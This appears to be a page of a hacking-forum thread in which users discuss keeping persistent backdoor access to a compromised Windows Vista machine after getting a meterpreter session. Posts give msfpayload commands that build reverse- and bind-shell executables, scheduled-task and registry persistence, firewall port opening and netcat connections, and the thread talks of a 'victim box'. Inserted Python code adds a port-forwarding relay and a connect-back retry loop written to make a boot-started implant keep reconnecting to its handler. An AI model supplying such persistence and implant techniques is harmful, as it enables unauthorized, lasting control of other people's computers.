Page 2 of 5
Results 11 to 20 of 45

Thread: Opening backdoor after getting meterpreter session

  1. #11
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    meterpreter >
    Background session 3? [y/N]
    msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
    [-] Invalid gateway specified.
    msf exploit(handler) >
    Well, it should be
    Code:
    route add 192.168.1.0 255.255.255.0 3
    Since the session is #3.


    To the other problem: lynx will break the shell here.
    Don't eat yellow snow :rolleyes:

  2. #12
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Quote Originally Posted by phoenix910 View Post
    I use "links", as opposed to "lynx", but whatever floats your boat. Also, as per my tutorial, just execute "links" and make sure you're interacting with the process, then you can tell it to browse to yahoo.com from there.

    ~phoenix910
    Did you use this one:
    http://links.sourceforge.net/
    I uploaded the exe file & DLLs..... again, locally it's working (although 192.168.1.1 doesn't work), but not remotely. I tried "execute -f links.exe -H -c -i" from the meterpreter session and also tried to run cmd first & then "links" from the shell...... any idea??

    Quote Originally Posted by hawaii67 View Post
    Well, it should be
    Code:
    route add 192.168.1.0 255.255.255.0 3
    Since the session is #3.


    To the other problem: lynx will break the shell here.
    Thanks a lot.... will try it

  3. #13

    Why not use Metasploit itself? Create a payload with msfpayload, something like this:
    Code:
    ./msfpayload windows/meterpreter/bind_tcp LPORT=8080 R | ./msfencode -c 2 -t exe -o 345532.exe
    then upload the exe into %WINDIR%\System32\ and schedule it to run every time the server is rebooted, like this:

    Code:
    schtasks /create /tn "SysCheckonStart" /tr c:\windows\system32\345532.exe /sc onstart
    then configure the built-in firewall to let the connection to this port through:

    Code:
    netsh firewall set portopening protocol = tcp port = 8080 mode = enable
    Or better yet, create an account and enable RDP or Telnet. You can use my meterpreter scripts that are part of Metasploit 3.2; just run in meterpreter
    Code:
    run getgui -h
    run gettelnet -h
    for the options; they will do all the heavy lifting for you. If you only have a shell, follow this post on my blog:

    http://darkoperator.blogspot.com/200...-shell-in.html

    There are many ways to skin the cat. I hope this sets you in the right direction, and sorry for the self-promotion by mentioning my scripts and blog.

  4. #14
    Junior Member Tr00g33k's Avatar
    Join Date
    Jul 2008
    Posts
    46

    BadKarmaPR, I liked your post very much, especially the one with the firewall port forwarding. Is there any way (maybe an option in Metasploit), maybe some program or something, to forward ports through a ROUTER without accessing the router page?

    Thanks in advance,
    Tr00G33k

  5. #15
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    sorry for the self-promotion by mentioning my scripts and blog
    Nonsense, your contributions to Metasploit and BackTrack are very valuable.

  6. #16
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    OK, I have a shell into my Vista box, but I don't have admin priv, so how do I set up a backdoor without admin priv?

  7. #17

    Quote Originally Posted by Tr00g33k View Post
    BadKarmaPR, I liked your post very much, especially the one with the firewall port forwarding. Is there any way (maybe an option in Metasploit), maybe some program or something, to forward ports through a ROUTER without accessing the router page?

    Thanks in advance,
    Tr00G33k
    Thanks. Sadly, the portfwd command in meterpreter in version 3.2 is broken; you might try to get a copy of 3.0 and test on it, and also on 3.1 with a reverse shell, since it has failed on the bind shell since its conception.

  8. #18

    Quote Originally Posted by cr1spyj0nes View Post
    OK, I have a shell into my Vista box, but I don't have admin priv, so how do I set up a backdoor without admin priv?
    If UAC is enabled this is going to be a hard one to make; you can place it in the Programs Startup folder. schtasks should let you schedule as the user, the same as AT.

  9. #19
    Junior Member Tr00g33k's Avatar
    Join Date
    Jul 2008
    Posts
    46

    So portfwd in Metasploit actually forwards ports through the router, firewall, etc. (it's meant to do this)? If I understand correctly?

    Tr00G33k
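What meterpreter's portfwd actually does is easier to see in code than in prose. The block below is an added Python illustration, not Metasploit's own code: a minimal TCP relay that listens on a local port and shuttles bytes to a target that is reachable from the relay host, which is the model behind `portfwd add -l <lport> -r <rhost> -p <rport>`. The echo server and the function names (start_forward, relay_pair, demo) are constructed for the demo. It also answers the question above: the forward rides on connectivity the pivot already has and does not reconfigure anyone's router, so getting an inbound connection through the victim's NAT is a separate problem.

```python
import socket
import threading

# Added illustration (not Metasploit's own code) of what meterpreter's
# "portfwd add -l <lport> -r <rhost> -p <rport>" models: accept on a local
# port, open a second connection to the target as seen from the relay host,
# and shuttle bytes both ways. The relay only reaches what its host can
# already reach; it does not punch holes in any router.


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_pair(client, target):
    """Run both directions until each side has closed, then release sockets."""
    threads = [
        threading.Thread(target=_pump, args=(client, target), daemon=True),
        threading.Thread(target=_pump, args=(target, client), daemon=True),
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    client.close()
    target.close()


def start_forward(lport, rhost, rport, lhost="127.0.0.1"):
    """Listen on lhost:lport; forward each accepted connection to rhost:rport.

    Returns the listening socket; close it to stop accepting."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((lhost, lport))
    listener.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = listener.accept()
            except OSError:
                return  # listener closed
            try:
                target = socket.create_connection((rhost, rport), timeout=5)
            except OSError:
                client.close()  # target unreachable from the relay host
                continue
            threading.Thread(target=relay_pair, args=(client, target),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener


def start_echo_server():
    """Constructed stand-in for the service behind the pivot: echoes one
    message back with an 'echo:' prefix. Returns its listening socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                data = conn.recv(4096)
                if data:
                    conn.sendall(b"echo:" + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo(payload=b"hello through the pivot"):
    """Stand up the echo service, forward a local port to it, send payload
    through the forward and return what came back."""
    echo = start_echo_server()
    rhost, rport = echo.getsockname()
    forward = start_forward(0, rhost, rport)  # port 0: pick a free local port
    lhost, lport = forward.getsockname()
    reply = b""
    with socket.create_connection((lhost, lport), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # done sending; now wait for the echo
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    forward.close()
    echo.close()
    return reply


if __name__ == "__main__":
    print(demo())  # b'echo:hello through the pivot'
```

In the real thing the second leg (create_connection to rhost:rport) is made by the meterpreter process on the compromised host, so rhost is resolved and routed from the victim's point of view; that is the whole value of the pivot, and also its limit.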

  10. #20
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Thanks a lot for the reply. However, for a few reasons (one could be my improper knowledge), I couldn't use any of these:

    Failure of 1st solution
    Quote Originally Posted by BadKarmaPR View Post
    Why not use Metasploit itself?
    Because I prepared the exe file
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=82.24.180.xxx LPORT=7777 R | ./msfencode -b '' -t exe -o toBT3box.exe
    then placed the exe on the Vista box with the public IP 82.24.180.yyy (yes, it's different). The exe connects back to the attacker ONLY if the exploit is running at the time of execution of the exe file. That means the exe file only tries ONCE to connect to the BT3 box; if it fails to connect (which happens when BT3 is not listening), Vista shows an error message "toBT3box.exe has stopped working .... bla bla bla".

    So, there is no point in scheduling the exe file to run every time the server reboots. I saved the exe file in the Windows folder & edited the remote registry to run it every time the computer restarts. This is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts), & if I miss it then I will have to wait until the other one restarts.

    Failure of 2nd solution
    Or better yet, create an account and enable RDP or Telnet. You can use my meterpreter scripts that are part of Metasploit 3.2; just run in meterpreter
    Code:
    run getgui -h
    run gettelnet -h
    I tried this one earlier; it didn't work. Please look at my 1st post in this thread for details. I used nc to listen on port 8888. Then I tried to connect to the box from BT3 (82.24.180.xxx) like this:
    Code:
    nc 82.24.180.yyy 8888
    The command is not working, because we didn't ask the router to forward port 8888 requests to the Vista box. And in the real world, I (or the attacker) wouldn't be able to configure the router of the victim box.

    Am I missing something???
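The one-try behaviour described in the post above is exactly what a bare reverse_tcp stager does: a single connect(), and the process dies if no handler is listening. The block below is an added Python illustration, not Metasploit's payload code, of that one-shot behaviour next to a connect-back loop with capped exponential backoff, which is what a boot-scheduled implant needs if the handler may be down when the machine comes up. The names (free_port, connect_once, connect_with_retry, demo) and the late-started loopback listener are constructed for the demo; the sleep function is injectable so the demo runs without real delays.

```python
import socket
import time

# Added illustration (not Metasploit's payload code). A bare reverse_tcp
# stager makes one connect() and the process dies if nothing is listening;
# an implant that is started at boot needs to keep trying until the handler
# appears. Both behaviours are modelled here against a loopback listener.


def free_port():
    """Pick a currently unused TCP port on loopback (constructed for the demo)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()
    return port


def connect_once(host, port, timeout=1.0):
    """One-shot behaviour: a single attempt, an OSError if nobody is listening."""
    return socket.create_connection((host, port), timeout=timeout)


def connect_with_retry(host, port, attempts=10, initial_delay=0.1,
                       max_delay=2.0, timeout=1.0, sleep=time.sleep):
    """Keep trying until a handler accepts, sleeping between attempts with
    exponential backoff capped at max_delay.

    Returns (connected socket, attempt number). Raises ConnectionRefusedError
    when every attempt failed. `sleep` is injectable so the demo and tests can
    run without real delays."""
    delay = initial_delay
    last_err = None
    for attempt in range(1, attempts + 1):
        try:
            return socket.create_connection((host, port), timeout=timeout), attempt
        except OSError as err:  # refused, unreachable or timed out
            last_err = err
            if attempt < attempts:
                sleep(delay)
                delay = min(delay * 2, max_delay)
    raise ConnectionRefusedError(
        f"no handler on {host}:{port} after {attempts} attempts: {last_err}")


def demo(handler_up_after=3):
    """Model a handler that only starts listening after `handler_up_after`
    failed attempts. Returns (one_shot_failed, attempt_that_succeeded)."""
    port = free_port()
    handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    handler.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    failures = 0

    def late_start(_delay):
        # Stands in for time.sleep: count the failed attempt, and bring the
        # handler up once enough attempts have failed.
        nonlocal failures
        failures += 1
        if failures == handler_up_after:
            handler.bind(("127.0.0.1", port))
            handler.listen(1)

    one_shot_failed = False
    try:
        connect_once("127.0.0.1", port).close()
    except OSError:
        one_shot_failed = True  # the one-try case: nothing listening yet

    sock, attempt = connect_with_retry("127.0.0.1", port, attempts=10,
                                       sleep=late_start)
    sock.close()
    handler.close()
    return one_shot_failed, attempt


if __name__ == "__main__":
    print(demo())  # (True, 4): one-shot failed, retry connected on attempt 4
```

The retry loop is the piece a scheduled exe is missing; in practice you would also cap the total run time or make the loop infinite with a long max_delay, depending on whether the task gets re-launched by the scheduler anyway.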
